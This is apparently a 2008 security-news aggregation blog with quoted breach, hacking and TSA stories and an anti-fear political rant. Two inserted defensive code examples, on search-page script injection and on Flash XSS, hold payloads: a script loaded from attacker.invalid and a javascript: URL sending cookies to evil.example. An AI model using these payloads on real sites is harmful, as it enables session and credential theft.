Verne Kopytoff writes in The San Francisco Chronicle:
When the nation's intelligence agencies wanted a computer network to better share information about everything from al Qaeda to North Korea, they turned to a big name in the technology industry to supply some of the equipment: Google Inc.
The Mountain View company sold the agencies servers for searching documents, marking a small victory for the company and its little-known effort to do business with the government.
"We are a very small group, and even a lot of people in the federal government don't know that we exist," said Mike Bradshaw, who leads Google's federal government sales team and its 18 employees.
The strategy is part of a broader plan at Google to expand beyond its consumer roots. Federal, state and local agencies, along with corporations and schools, are increasingly seen by the company as lucrative sources of extra revenue.
A hacker club has published what it says is the fingerprint of Wolfgang Schauble, Germany's interior minister and a staunch supporter of the collection of citizens' unique physical characteristics as a means of preventing terrorism.
In the most recent issue of Die Datenschleuder, the Chaos Computer Club printed the image on a plastic foil that leaves fingerprints when it is pressed against biometric readers.
No-one from the Germany-based group has been able to test the foil to see if it can fool a computer into believing it came from Schauble. But the technique has been shown to work with a variety of other people's prints on almost two-dozen readers, according to a colleague of the hacker who pulled off the demonstration.
As of Saturday, March 29, 2008, at least 4,007 members of the U.S. military have died since the beginning of the Iraq war in March 2003, according to an Associated Press count. The figure includes eight military civilians. At least 3,261 died as a result of hostile action, according to the military's numbers.
The AP count is seven more than the Defense Department's tally, last updated Friday at 10 a.m. EDT.
A mysterious bomb-making experiment that ended with the accidental death of a government scientist has remained an official secret for more than five years, leaving his family in the dark about what went wrong.
Terry Jupp, a scientist with the Ministry of Defence, was engulfed in flames during a joint Anglo-American counter-terrorism project intended to discover more about al-Qaida's bomb-making capacities.
There has been no inquest into his death, as the coroner has been waiting for the MoD to disclose information about the incident. An attempt to prosecute the scientist's manager for manslaughter ended when prosecutors said they were withdrawing the charge, but said the case was too "sensitive" to explain that decision in open court.
More than 90 weapons and 230 laptop computers belonging to the Drug Enforcement Administration have turned up missing over the past five years and, despite efforts by the agency to address weaknesses in tracking the items, "significant deficiencies" remain, a report said yesterday.
The lost and stolen weapons include pistols, rifles, shotguns and a submachine gun, said a 105-page report by the Justice Department's Office of Inspector General, which also noted that DEA officials could not say how 198 of the 231 laptop computers came to be missing.
Inspector General Glenn A. Fine said the DEA was unable to provide assurance that 226 of the 231 lost or stolen laptop computers did not contain "sensitive or personally identifiable" information, adding that few of the missing laptops were protected by encryption software.
Disrupting business at Aspen booking agency Ski.com will cost a former employee $13,096, a federal judge has ruled.
James M. DiBlasio, convicted of two federal felonies connected to computer tampering, also must serve six months of house arrest and three years of probation as part of a sentence handed down March 14 by Judge Lewis T. Babcock.
The former Aspen resident also was ordered to undergo alcohol abuse treatment and mental health treatment. Additionally, DiBlasio cannot open new credit accounts or incur additional credit charges, according to documents filed in the U.S. District Court in Denver.
DiBlasio, now a resident of Indiana, was a sales representative for Ski.com from September 2004 through November 2006.
In October, a federal grand jury indicted him for deleting airline reservations, altering contact information between Ski.com and the airlines with which it books reservations, and deleting electronic data that Ski.com used to review available reservations. DiBlasio also changed the profile Ski.com sent to airlines. The indictment said DiBlasio committed the crimes in January 2007, from a computer in Indiana.
The crimes were committed when DiBlasio went on a “three-day drinking binge,” according to a sentencing memorandum written by his attorney, H. Michael Steinberg of Greenwood Village, Colo.
Late Night Rant: Culture of Fear - A War on Everyone, Everything, Everywhere
Since September 11, 2001, Americans -- and other nationalities -- have been bombarded with fear.
That's a plain fact. And there are a few other facts I'd like to highlight.
But don't misunderstand me -- 9/11 was a horrible, despicable act of terrorism that took the life of thousands of innocent victims.
The culture of fear that followed set into motion some very distasteful events, "strategies" and government policies that may prove equally damaging in the long term: they erode the rule of law, the right to reasonable privacy and due process under the law (habeas corpus); they have led to the immoral (and quite possibly illegal) torture and detention of individuals without reasonable cause; and they will further besmirch the reputation of the United States for generations to come.
The news media and the faux, self-serving, patriarchal Republican Bush administration cronies, and anyone else on this planet who would benefit from the masses cowering in fear of a catastrophic terrorist attack, have made it their business to ensure that you are aware that the dangers are everywhere, and "...they're out to kill you, those dirty terrorist bastards".
Issues need to be seen as they are, not as they are presented.
This isn't going to be a full-tilt, vapid rant, but I did want to get a couple of issues off my chest.
So bear with me.
A lot of more eloquent writers (especially Chalmers Johnson) have written much more in-depth about the decay of "The American Situation" and associated issues, so I won't try to reinvent the wheel here. But I would like to mention a couple of salient points.
First, since 9/11, the (what I would consider to be) sacred values set forth by our founding fathers in the U.S. Constitution, the balance among the three branches of government, the Bill of Rights, et al., have been rendered somewhat "dispensable" by a President who seems bent on destroying this country by ignoring the rule of law, and who has promulgated a semi-fascist end-game.
For instance, I give you the FBI "Operation TIPS" program. Operation TIPS is the acronym for the "Terrorism Information and Prevention System", a program proposed by the Bush administration in 2002 to have U.S. citizens report suspicious activity, that is, to report your friends and neighbors (or any person who looks suspicious, like brown people taking out the trash) as possible terrorists.
This concept is not new, of course.
"Bocca di Leone" - The Lion's Mouth
In 15th century Venice, Italy, the established rulers crafted a series of clever ways for the citizenry to rat out their friends and neighbors for all sorts of offenses, criminal or religious (blasphemy), real or imagined.
The most ingenious were sculpted fixtures built into the walls of government buildings, in the image of lions or other figures, wherein the mouth was a slot into which "complaints" could be lodged against someone who "needed to be brought to the attention of the authorities."
Now, of course, you can certainly imagine how this could be abused by someone with a grudge, and indeed the system fostered the prosecution, and persecution, of untold numbers of innocents.
Think: Witch hunt. Or religious purification. Or terrorism, for that matter.
"Culture of fear is a term that refers to a perceived prevalence of fear and anxiety in public discourse and relationships, and how this may affect the way people interact with one another as individuals and as democratic agents."
The U.S. Government, and specifically the Bush Administration, has masterfully employed these sorts of tactics to secretly manipulate the rule of law, bypassing the confines of the Constitutional limits of the executive branch, and empowering themselves in such a way as to further their goals -- the complete and utter freedom to pursue their goals and operate in an environment where they feel beyond reproach from congressional or judicial restraint.
This chain must be broken. The Constitutional balance of powers must be restored.
Why Do We Often Fear the Wrong Things?
Grant Jewell Rich, reviewing Barry Glassner's book "The Culture of Fear", called it a "...wonderfully written new book" in which "Barry Glassner reminds us again and again that frequently our fears are grossly exaggerated given the actual frequency of these rare events."
Indeed, as Rich points out, "...News media may use these fears to earn higher ratings, politicians may play on our fears during elections, and perhaps, in a sense, even lobbyists for special interest groups may exchange fear for increased fund-raising."
Bruce Schneier often writes about the "War on the Unexpected", illustrating how this Culture of Fear is manifesting itself in very real and sociologically damaging ways.
And in the latest, and most outrageous to date, the Transportation Security Administration (TSA) continues to display random acts of stupidity, in a rather perverse manifestation of the Culture of Fear run amok.
Why is this important? Real, Unabridged, Truthful Security
Security in your person, security on the world stage, trickle-down security that benefits all of us globally, instead of the damaging "devil-may-care", slash-and-burn policies of the current U.S. administration.
Without lies, or pretexts, or half-truths.
And maybe even a breath of life into an economy that has been deflated by multi-billion dollar spending on a war that never should have happened.
American leaders, politicians, patricians, and policemen must stop ramming their policies down the collective throats of the American people. Anyone who engages in this rhetoric is not a true leader -- they are a liability, a blow to true democracy, and a stain on the cloth of the American people, and the rest of the peace-loving people on Planet Earth.
It must stop, and it must stop now. We must break this cycle.
The policies employed since 9/11 are harming America, not helping it.
As of Friday, March 28, 2008, at least 4,005 members of the U.S. military have died since the beginning of the Iraq war in March 2003, according to an Associated Press count. The figure includes eight military civilians. At least 3,261 died as a result of hostile action, according to the military's numbers.
The AP count is five more than the Defense Department's tally, last updated Friday at 10 a.m. EDT.
In a practice adopted at one college after another since the massacre at Virginia Tech, a University of Kentucky committee of deans, administrators, campus police and mental health officials has begun meeting regularly to discuss a watch list of troubled students and decide whether they need professional help or should be sent packing.
These "threat assessment groups" are aimed at heading off the kind of bloodshed seen at Virginia Tech a year ago and at Northern Illinois University last month.
The Kentucky panel, called Students of Concern, held its first meeting last week and will convene at least twice a month to talk about students whose strange or disturbing behavior has come to their attention.
The head of U.S. intelligence has established a new committee of senior officials to oversee technical measures needed to protect classified data and networks.
In a directive issued last month and posted on the Web by the Secrecy News blog this week, U.S. Director of National Intelligence Michael McConnell outlined steps to improve countermeasures against technical surveillance. Such measures, called TSCM, "are designed to detect and nullify a wide range of technologies used to gain unauthorized access to classified national security information," wrote McConnell.
The directive establishes the National Integrated Technical Surveillance Counter-Measures Committee, a body made up of senior officials from all 16 U.S. intelligence agencies and led by one of McConnell's deputies.
The agency that manages data from U.S. spy satellites is exploring ways to map the nation's entire electric grid as part of efforts to protect infrastructure.
The National Geospatial-Intelligence Agency wants to create an "electric energy infrastructure dataset," including the geographical locations of all transmission lines, power plants, substations, and generating units, to show the way power flows through the system and where the control points are, the agency said this week in procurement documents.
In a so-called sources sought notice, the NGA asks any companies that could provide such a database how accurate their geo-locational data is, what format they could provide the database in, and how often it would be updated.
The database is being established, the notice says, "in support of the federal level homeland security, homeland defense, and emergency response and recovery missions to protect the nation's infrastructure."
PCI compliance shouldn't—and, in my opinion, likely won't—provide this absolute legal protection being touted. The intent was always that if a retailer could establish that they insistently did everything they could have done—and should have done—properly in terms of data protection, that they would then have their liability severely limited. That makes sense.
But to project that on a once-a-year declaration of compliance from one assessor based on fragmentary examination of a single point-in-time—working with an imperfect list of interpretable guidelines—is little more than ludicrous.
An Arizona man filed a proposed class-action lawsuit against LifeLock, a Tempe-based company that claims to protect customers against identity theft.
The lawsuit alleges that the company has defrauded customers by offering services it can't legally perform, as well as by claiming a $1 million guarantee that, after reading the fine print, is limited to the point of being useless.
LifeLock has gained notoriety with commercials that show CEO Tom Davis's Social Security number on the side of a truck, while Davis tells the audience that he is confident his company's services will protect him – and potential customers – from having their identity stolen.
The advertising is misleading and false, according to Rob Carey, partner in the law firm Hagens Berman Sobol Shapiro.
The nonprofit Epilepsy Foundation, which runs the forum, briefly closed the site Sunday to purge the offending messages and to boost security.
"We are seeing people affected," says Ken Lowenberg, senior director of web and print publishing at the Epilepsy Foundation. "It's fortunately only a handful. It's possible that people are just not reporting yet -- people affected by it may not be coming back to the forum so fast."
The incident, possibly the first computer attack to inflict physical harm on the victims, began Saturday, March 22, when attackers used a script to post hundreds of messages embedded with flashing animated gifs.
A blossoming Web attack, first reported by security researcher Dancho Danchev earlier this month, has expanded to hit more than a million Web pages, including many well-known sites.
"The number and importance of the sites has increased," wrote Danchev in a Friday blog posting where he reported that trusted Web sites such as USAToday.com, Target.com, and Walmart.com have been hit with the attack.
The criminals behind this have not actually hacked into servers, but they are taking advantage of Web programming errors to inject malicious code into search results pages created by the Web sites' internal search engines.
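The injection mechanism described above, as an added example that is not code from the article or from any of the sites named in it: a minimal search-results renderer that reflects the query verbatim (the programming error being exploited), the same renderer with HTML escaping applied, and a scan over access-log lines for search requests that carry markup. The search path `/search`, the parameter name `q`, the host `attacker.invalid` and the log lines are all constructed for illustration and are assumptions, not details from the report.

```python
import html
import re
from urllib.parse import parse_qs, urlsplit

# Constructed sample: the query string a victim is lured into opening.
# The "q" value decodes to <script src="http://attacker.invalid/x.js"></script>;
# attacker.invalid is a placeholder host, not a real malicious site.
PAYLOAD_QUERY = (
    "q=%3Cscript+src%3D%22http%3A%2F%2Fattacker.invalid%2Fx.js%22%3E%3C%2Fscript%3E"
)

# Constructed Common Log Format lines (assumed layout, not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [28/Mar/2008:14:02:11 -0700] "GET /search?q=ski+jackets HTTP/1.1" 200 5120',
    '198.51.100.23 - - [28/Mar/2008:14:02:13 -0700] "GET /search?' + PAYLOAD_QUERY + ' HTTP/1.1" 200 5210',
    '203.0.113.9 - - [28/Mar/2008:14:03:40 -0700] "GET /product/123 HTTP/1.1" 200 8800',
    '198.51.100.23 - - [28/Mar/2008:14:04:02 -0700] "GET /search?q=%22%3E%3Ciframe+src%3D%22http%3A%2F%2Fattacker.invalid%2F%22%3E HTTP/1.1" 200 5300',
]


def extract_query(query_string: str) -> str:
    """Return the decoded value of the q parameter ('' if absent)."""
    return parse_qs(query_string, keep_blank_values=True).get("q", [""])[0]


def render_results_vulnerable(query_string: str) -> str:
    """The bug: the user-supplied search term is pasted into the HTML as-is,
    so a crafted link makes the site's own page serve the attacker's markup."""
    q = extract_query(query_string)
    return f"<h1>Results for: {q}</h1>\n<p>No products matched your search.</p>"


def render_results_hardened(query_string: str) -> str:
    """Same page, but the term is escaped for the HTML body context
    before it is reflected, so angle brackets and quotes become entities."""
    q = extract_query(query_string)
    safe = html.escape(q, quote=True)
    return f"<h1>Results for: {safe}</h1>\n<p>No products matched your search.</p>"


# Markup fragments that have no business in a product search term.
SUSPICIOUS = re.compile(r"<\s*script|javascript:|<\s*iframe|onerror\s*=", re.I)

# Common Log Format request line: client, identity, user, timestamp, request, status.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) HTTP/[\d.]+" (?P<status>\d{3})'
)


def find_injection_attempts(log_lines, search_path: str = "/search"):
    """Return (client_ip, decoded_query) for search requests whose q value
    contains script or frame markup. Only the search endpoint is inspected,
    since that is the page whose reflection the attack abuses."""
    hits = []
    for line in log_lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        parts = urlsplit(m.group("target"))
        if parts.path != search_path:
            continue
        q = extract_query(parts.query)
        if SUSPICIOUS.search(q):
            hits.append((m.group("ip"), q))
    return hits


if __name__ == "__main__":
    print("vulnerable page:\n" + render_results_vulnerable(PAYLOAD_QUERY))
    print("hardened page:\n" + render_results_hardened(PAYLOAD_QUERY))
    for ip, q in find_injection_attempts(SAMPLE_LOG):
        print(f"injection attempt from {ip}: {q!r}")
```

`html.escape` is the right fix only because the term lands in HTML body text; a value reflected inside an attribute, a `<script>` block or a URL needs the escaping for that context instead. The log scan is a coarse triage filter for the pattern the report describes, not a complete XSS detector.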
Pellicano Trial: Slashed Tires, Ransacked Houses, and Nasty Hollywood Divorces
Allison Hope Weiner writes on The Huffington Post:
Wearing a beautifully tailored dark suit and red tie, actor Keith Carradine testified today about how he'd been wiretapped and harassed by Anthony Pellicano during his divorce from ex-wife, Sandra Carradine. Apparently, after Mr. Carradine split with his wife in 2000, bad things started happening to him. Not only did he find himself in the middle of a nasty, contentious divorce, his ex-wife also started dating Anthony Pellicano.
On top of that, Mr. Carradine testified that his then girlfriend (and now wife), Hayley Dumond, was "aggressively" followed by an unknown man, the tires of her car were slashed and her parents received numerous phone calls and hang-ups in the middle of the night. He got a call from a guy with a bad, fake accent, who offered to help him with his divorce.
Video surveillance is suddenly "the fastest-growing market for [digital] video chip providers."
The top executive at one such company, president and CEO Chris Day of Mobilygen (Santa Clara, Calif.), made that comment shortly after wrapping up a trip to China, where video surveillance applications are proliferating at an alarming rate.
Indeed, according to a China Security Market Report issued last year by the Security Industry Association (Alexandria, Va.), China's security and protection market, which includes fire and safety monitoring along with security surveillance and access control is projected to jump from $6.3 billion in 2005 to $18 billion in 2010.
That should come as no surprise to many in the U.S. financial community, which has been closely following the growth of companies that install and operate surveillance systems at banks, police stations, Internet cafes and other public places in China. The International Herald Tribune last year reported that American hedge funds have put more than $150 million into Chinese surveillance companies.
"TSA may support the 'thoroughness of the Officers involved' but the rest of the country thinks they are a bunch of power hungry goons with no sense of decency or common sense. That's even as airport security has gotten faster and a little less arbitrary over the last few years."
"I am continually amazed that officials at Homeland Security think they have any capital left to spend on defending this kind of stupidity."
- Ryan Singel, writing on Threat Level, regarding a statement by the U.S. Transportation Security Administration defending its agents' jack-booted thuggery when they forced a passenger to remove her nipple rings before boarding a flight in Lubbock, Texas.
Hackers Target Indonesian Government Over Online Porn Ban
An AFP newswire article, via NASDAQ.com, reports that:
Hackers took over an Indonesian government website for several hours to protest against a new law banning online pornography, the information ministry said Friday.
The protesters posted a message Thursday on the ministry of information website challenging it to "prove that the law was not drafted to cover the government's stupidity." Indonesia's parliament passed a law Tuesday against producing or accessing websites with pornographic or violent content.
"The message seemed to be directed at the law that was just passed by parliament," said ministry official Ferdinandus Setu, adding the site was taken down for a period but was now back to normal.
The new law, which has still to be approved by the president, provides for a maximum penalty of six years in jail or a fine of up to IDR1 billion ($110,000) for disseminating pornographic material online.
The ministry said it would start distributing software Saturday to allow Internet users to block pornographic sites.
Earlier this month, Security Fix took a look at Dmitry Ivanovich Golubov, a Ukrainian politician once considered by U.S. law enforcement to be a top cybercrime boss.
Golubov took rather strong exception to the way he was characterized in that post, denying involvement in any type of cybercrime activity. The problem, Golubov claimed, is that the FBI confused him with someone else.
According to Golubov, he was the victim of identity theft. Someone gained access to his passport, scanned it and posted it online along with a note confessing his involvement in a multinational credit card theft ring.
[Former FBI Agent E.J. Hilbert, who worked closely on the Golubov investigation] ...Hilbert says he's speechless at the vehement denials.
A massive data breach at Hannaford Brothers Cos. was caused by a "new and sophisticated" method in which software was secretly installed on servers at every one of its grocery stores, the company told Massachusetts regulators this week.
The unauthorized intrusion the company disclosed on March 17 stemmed from software that intercepted card data from customers as they paid with plastic at store checkout counters, and sent the data overseas, Hannaford's top lawyer said in a letter sent to Attorney General Martha Coakley and Governor Deval Patrick's Office of Consumer Affairs and Business Regulation.
The software was installed on computer servers at each of the roughly 300 stores operated by Hannaford and its partners. Hannaford did not say how the software might have been placed on so many servers, and company spokeswoman Carol Eleazer said the company continues to investigate how the software was installed and other specifics of the breach. The Secret Service, which pursues currency crimes, is conducting its own investigation.
Data security specialists say the new details show how hackers have grown more adept at penetrating weak links in the systems that connect merchants and banks.
A Texas woman who claims she was forced to remove a nipple ring with pliers in order to board an airplane called Thursday for an apology by federal security agents and a civil rights investigation.
"I wouldn't wish this experience upon anyone," Mandi Hamlin, 37, said at a news conference in Los Angeles. "My experience with TSA was a nightmare I had to endure. No one deserves to be treated this way."
Hamlin said she was trying to board a flight from Lubbock to Dallas on Feb. 24 when she was scanned by a Transportation Security Administration agent after passing through a larger metal detector without problems.
The female TSA agent used a handheld detector that beeped when it passed in front of Hamlin's chest, the Dallas-area resident said.
Hamlin said she told the woman that she was wearing nipple piercings. The female agent then called over her male colleagues, one of whom said she would have to remove the body piercings, Hamlin claimed.
Hamlin said she could not remove them and asked if she could instead display her pierced breasts in private to the female agent. But several other male officers told her she could not board her flight until the jewelry was removed, she said.
She was taken behind a curtain and managed to remove one bar-shaped nipple piercing but had trouble with the second, a ring.
"Still crying, she informed the TSA officer that she could not remove it without the help of pliers, and the officer gave a pair to her," said Hamlin's attorney, Gloria Allred, reading from a letter she sent Thursday to the director of the TSA's Office of Civil Rights and Liberties. Allred is a well-known Los Angeles lawyer who often represents high-profile claims.
Hamlin showed reporters at the news conference how she took off the second ring by applying pliers to the torso of a mannequin that had a peach-colored bra with the rings on it.
She said she heard male TSA agents snickering as she took out the ring. She was scanned again and was allowed to board even though she still was wearing a belly button ring.
Note: This is simply inexcusable. The ability for the TSA to continue to humiliate and defile American (or any other nationality for that matter) travelers is completely despicable. These practices must be stopped, and the offenders severely punished to the ultimate extent of the applicable laws. We demand it. -ferg
Companies Avoid Financial Penalties After Massive Computer Data Breaches
An AP newswire article by Dan Caterinicchia, via The Washington Post, reports that:
More than a year after millions of T.J. Maxx and Marshalls customers found out their credit card information had been hacked into, the discount stores' operator agreed to have its information audited but avoided paying federal fines.
TJX was one of three firms that agreed to settle charges that it "failed to provide reasonable and appropriate security for sensitive consumer information," federal regulators said yesterday in two unrelated data-breach decisions.
Data broker Reed Elsevier and its Seisint subsidiary also avoided fines but have agreed to obtain third-party audits biennially for 20 years under a separate settlement with the Federal Trade Commission.
The agreements, which will be finalized after a 30-day public comment period, also require the companies to implement comprehensive information security programs.
A computer hacker from Washington state was sentenced to three years in prison for placing a phony 911 call that led a SWAT team to storm a family home at gunpoint.
It marked the first prosecution in Orange County for a prank known as "swatting" that involves sending SWAT teams on wild goose chases, county district attorney's spokeswoman Farrah Emami said Thursday.
Randal T. Ellis, 19, pleaded guilty Wednesday in Orange County Superior Court to five felony counts, including computer access and fraud, false imprisonment by violence and falsely reporting a crime.
He was given prison time and ordered to pay $14,765 in restitution, most of which will go to the county Sheriff's Department.
Verne Kopytoff writes on The San Francisco Chronicle's "The Tech Chronicles" Blog:
Connecticut Attorney General Richard Blumenthal today threatened legal action against Craigslist if it does not curb prostitutes from advertising their services on its Web site.
In a letter to Craigslist today, he took the San Francisco Web site to task for failing to have someone on staff to review postings by prostitutes, many of which use a section for "erotic services." Although Craigslist, a largely free online classified service, touts measures to ban illegal activities and to remove inappropriate postings, its actions are inadequate, he concluded.
A former technician who worked for Hart InterCivic -- a voting machine company based in Texas -- has alleged that his company lied to election officials about the accuracy, testing, reliability and security of its voting machines. The whistleblower says the company did so because it was eager to obtain some of the approximately $4 billion in federal funds that Congress allocated to states in 2002 to purchase new voting equipment under the Help America Vote Act (aka HAVA).
The technician, William Singer, filed a qui tam lawsuit on the federal government's behalf last year but the lawsuit remained sealed until today, according to the Associated Press, when the U.S. Attorney's office decided it would not join Singer in the litigation. Singer maintains that Hart was paid federal money under false pretenses for the eSlate machines it sold to states. He's now pursuing the case without the government and, according to a voicemail message that one of his lawyers left me, he's now doing so in conjunction with Robert Kennedy, Jr. If Singer wins and Hart InterCivic is forced to return funds to the federal government, Singer stands to obtain a percentage of those funds as a party to the suit.
Some users of the Sony PlayStation network may have had their passwords changed and personal information exposed through unauthorized access, the gaming platform provider has disclosed.
The restricted access may have occurred through a vulnerability in the PlayStation Store, a content download service of the PlayStation Network, according to a company statement on Wednesday. Changing the passwords makes it “possible to view users' personal information and/or use the Wallet for the PlayStation Store.”
The company said it was unlikely that credit card numbers were compromised.
PlayStation said the bug has been patched and the company is contacting users whose information may have been accessed. If a user's regular password works, that information was not affected, the statement said.
American citizens won't need a passport to cross the land borders until the middle of next year, delaying that requirement by more than a year.
New identification document requirements, the Department of Homeland Security and Department of State announced Thursday, will take effect June 1, 2009. By that date, travelers will need to present documents that show both identification and U.S. citizenship to cross back from Mexico and Canada. For most travelers, that will mean a passport.
The policy shift is the final step of the Western Hemisphere Travel Initiative (WHTI), which changes document requirements for travelers who were previously exempt — including citizens of the U.S., Canada and Bermuda.
The wire tapping of servers has led to the arrests of several individuals associated with a New Jersey-based gambling ring, reports online gambling website Gambling911.com.
Investigators can easily monitor every online bet made by agents just as they would with phone taps, a source told Gambling911.
There are currently several ongoing investigations into similar groups that offer these online bets, where stateside credit bookies use offshore wire rooms to facilitate the businesses, and a website is often provided to make it easier for participants to place bets.
New Jersey authorities arrested 42 people this week in connection with a gambling and drug ring allegedly run by the notorious New York City-based Genovese crime family, reports Gambling911. Some of the arrested individuals worked as administrators for the New Jersey public school system.
Remember how e-voting firm ES&S was so against letting California's Secretary of State have an independent security team review their e-voting machines? Well, now we know why. The state had already released one damning security report and sued ES&S for giving the state uncertified machines. Now the state has come out with another report on more ES&S machines and the story gets worse and worse and worse.
The good news is that California won't certify any of them. The bad news is that ES&S appears to not only be belligerent in not wanting to let California review its machines, but it also seems to be incompetent as well.
It may be the quickest $10,000 Charlie Miller ever earned.
He took the first of three laptop computers -- and a $10,000 cash prize -- Thursday after breaking into a MacBook Air at the CanSecWest security conference's PWN 2 OWN hacking contest.
Show organizers offered a Sony Vaio, Fujitsu U810, and the MacBook as prizes, saying that they could be won by anybody at the show who could find a way to hack into each of them and read the contents of a file on the system using a previously undisclosed "0day" attack.
Nobody was able to hack into the systems on the first day of the contest when contestants were only allowed to attack the computers over the network, but on Thursday, the rules were relaxed so that attackers could direct contest organizers using the computers to do things like visit Web sites or open e-mail messages.
Miller, best known as one of the researchers who first hacked Apple's iPhone last year, didn't take much time. Within 2 minutes, he directed the contest's organizers to visit a Web site that contained his exploit code, which then allowed him to seize control of the computer, as about 20 onlookers cheered him on.
Two months after Adobe Systems patched a serious flaw in its Flash development software, there are still hundreds of thousands of Web pages serving up buggy Shockwave Flash (.swf) files that could be exploited by hackers, according to a Google researcher.
Google security engineer Rich Cannings discovered the widespread vulnerability in his spare time while researching a book on Web security. It turned out that many Flash development tools created files that could be used by hackers in what's known as a cross-site scripting attack. This attack can be used in phishing, but it also gives the bad guys a nearly undetectable route into a victim's bank account or almost any type of Web service.
Cannings estimates that more than 10,000 Web sites are still affected by the issue.
Cannings first noticed the bug on Google's Web site and tracked down the Google employee responsible for the flaw: a sales representative who had been using Dreamweaver to create buggy Flash files.
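As an added illustration of the bug class the article describes (this is not Cannings' or Adobe's code, and the page itself does not spell out the mechanism), the assumption here is the common pattern: a Flash movie navigates to a URL taken from an untrusted FlashVars parameter such as "clickTAG". A "javascript:" URL supplied that way runs in the origin of the page embedding the movie, which is exactly the cross-site scripting route into a bank session the article warns about. The parameter name, the hosts and the sample inputs are constructed for the example.

```python
# Added example, not code from the article: an untrusted "clickTAG" parameter
# used as a navigation target, beside the allowlist check that neutralises it.
from urllib.parse import parse_qs, urlsplit

def parse_flashvars(query: str) -> dict:
    """Parse 'a=1&b=2' (FlashVars use query-string syntax) into {name: value}."""
    pairs = parse_qs(query.lstrip("?"), keep_blank_values=True)
    return {k: v[0] for k, v in pairs.items()}

def vulnerable_target(flashvars: dict) -> str:
    """What getURL(_root.clickTAG) effectively does: trust the parameter as-is.
    A javascript: URL here executes in the embedding page's origin."""
    return flashvars.get("clickTAG", "")

def safe_target(flashvars: dict, allowed_hosts=None, fallback: str = "/") -> str:
    """Accept only absolute http(s) URLs, optionally pinned to known hosts."""
    raw = flashvars.get("clickTAG", "").strip()
    parts = urlsplit(raw)                  # scheme is lowercased by urlsplit
    if parts.scheme not in ("http", "https"):
        return fallback                    # javascript:, data:, vbscript:, relative, empty
    host = (parts.hostname or "").lower()
    if not host:
        return fallback
    if allowed_hosts is not None and host not in allowed_hosts:
        return fallback                    # also defeats https://trusted@evil.example/ tricks
    return raw

# Constructed inputs: a legitimate banner click and an XSS attempt.
BENIGN = parse_flashvars("clickTAG=https://ads.example.com/click?id=42")
ATTACK = parse_flashvars(
    "clickTAG=javascript:document.location%3D'http://evil.example/'%2Bdocument.cookie"
)
```

The scheme check alone stops the script URL; the host allowlist is what stops the movie from being turned into an open redirector for phishing, the other use the article mentions.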
Researchers at Finjan Software have discovered a one-stop online marketplace for buying stolen credit card and other sensitive information that offers volume discounts as well as customer service perks like "product" guarantees, according to a published report.
The so-called SellCVV2 Website, apparently named after the Card Verification Value 2 number on the backs of many major credit cards, appears to be using Google’s Blogspot service, according to Finjan. The big difference between SellCVV2 and other card-swapping sites "is the level of commercialization of the traders involved," Yuval Ben-Itzhak, CTO of Finjan, said in the report.
The FBI has gone through nearly all of its $500 million budget for making old telephone switches wiretap friendly, but an FBI survey showed that nearly 40 percent of the nation's switches still aren't up to federal wiretapping standards, according to a new report from the Justice Department's inspector general.
According to a redacted report [.pdf] from the DOJ's Inspector General, the FBI has only a little more than $5000 left in dedicated CALEA funds, which mostly went towards paying switch manufacturers to write wiretapping software and issue licenses to use that software for older switches.
The audit says it is not possible to tell if the money was well-spent, since neither the telecoms nor the switch makers are keen on sharing information.
The Federal Trade Commission (FTC) on Thursday announced a settlement with TJX over the discount retailer's massive breach of customer credit card records.
Last year, Framingham, Mass.-based TJX, which operates more than 2,500 stores worldwide, revealed that hackers stole some 45.7 million records from its systems over a two-year period. Court filings since the disclosure have placed the amount at twice that number.
Based on its charges, the FTC painted a bleak information security picture of TJX, the parent company for Marshalls and T.J. Maxx outlets.
The FTC, in a statement Thursday, said TJX lacked proper security solutions, such as firewalls and wireless defense, and failed to patch vulnerabilities and update anti-virus signatures. The company also transmitted personal information in clear text, failed to require strong passwords and lacked measures to detect and prevent unauthorized computer access, the FTC also stated.
A hacker picking apart the security model of Microsoft's brand new Windows Server 2008 has found serious design weaknesses that render some of the product's new security protections "useless."
Cesar Cerrudo, founder and CEO of Argeniss Information Security, in Parana, Argentina, says the weaknesses could lead to privilege escalation attacks, opening the door for a skilled hacker to take complete control of the operating system.
The opening of Heathrow's £4.3bn Terminal 5 this morning has been marred by problems with two major IT systems.
The introduction of fingerprinting was brought to a halt just hours before the new state-of-the-art terminal opened, following data protection concerns raised by the Information Commissioner’s Office.
The ICO has begun an investigation into data protection and the new fingerprinting system, focusing on passengers transferring on to domestic flights at T5.
Not long after BAA announced it would not fingerprint passengers, a sophisticated IT system aimed at cutting baggage handling times broke down. According to reports, arriving passengers were left stranded for up to two and a half hours, while “technical” problems were resolved to enable BAA to return their luggage.
The BBC has contacted the police after files containing personal details about all staff going to the Beijing Olympics this summer were stolen.
Details including passport numbers of 437 staff, from presenters to translators, were stored in the files in a private room at BBC Television Centre in west London. It is understood they went missing around March 14.
Those affected have been contacted and BBC director of sport Roger Mosey has sent out an email to other staff asking for their help in retrieving the files.
Sources said the BBC has been advised there is a low risk of identity fraud.
Aside from the passport information, the files also contain home addresses, pictures and details of which hotels BBC staff will be staying in.
A former San Jose City Council intern will perform 50 hours of community service after pleading guilty to a reduced charge of hacking into a city e-mail system last fall.
Eric Hernandez, 18, pleaded guilty Wednesday after Superior Court Judge Jerome Nadler granted a defense motion to reduce the charge from a felony to a misdemeanor. Nadler said he granted the motion based on the young man's lack of a prior criminal record and the circumstances of the offense.
Hernandez, who had interned for Councilman Sam Liccardo last summer, admitted to police earlier this year that he made unauthorized use of a password to troll through city e-mail accounts from his home computer, looking for political dirt to spread about his former boss's girlfriend. Police reported that Hernandez broke into the account of city staffer Jessica Garcia-Kohl more than 100 times.
As of Wednesday, March 26, 2008, at least 4,003 members of the U.S. military have died since the beginning of the Iraq war in March 2003, according to an Associated Press count. The figure includes eight military civilians. At least 3,257 died as a result of hostile action, according to the military's numbers.
The AP count is seven more than the Defense Department's tally, last updated Wednesday at 10 a.m. EDT.
As of Wednesday, March 26, 2008, at least 422 members of the U.S. military had died in Afghanistan, Pakistan and Uzbekistan as a result of the U.S. invasion of Afghanistan in late 2001, according to the Defense Department. The department last updated its figures March 22 at 10 a.m. EDT.
Of those, the military reports 289 were killed by hostile action.
File Sharers Get Help Spotting ISP 'Throttling' Moves
An AP newswire article by Peter Svensson, via The Houston Chronicle, reports that:
